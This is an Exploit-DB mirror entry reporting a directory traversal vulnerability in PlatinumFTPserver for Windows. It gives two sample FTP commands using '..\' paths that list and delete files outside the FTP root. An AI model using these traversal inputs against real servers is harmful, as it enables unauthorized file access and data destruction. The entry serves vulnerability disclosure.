exploit-db-mirror/exploits/windows/remote/22136.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
540 B
Text

source: https://www.securityfocus.com/bid/6554/info
PlatinumFTPserver is an FTP server for Microsoft Windows systems. It is commercially available, and distributed by PlatinumFTP.
A directory traversal vulnerability has been reported in PlatinumFTPserver. The program does not sufficiently handle dot-dot-slash input, which could result in an attacker gaining access to unauthorized resources.
dir ..\directory
where directory represents a directory outside the FTP root.
del ..\file
where file represents a file outside the FTP root.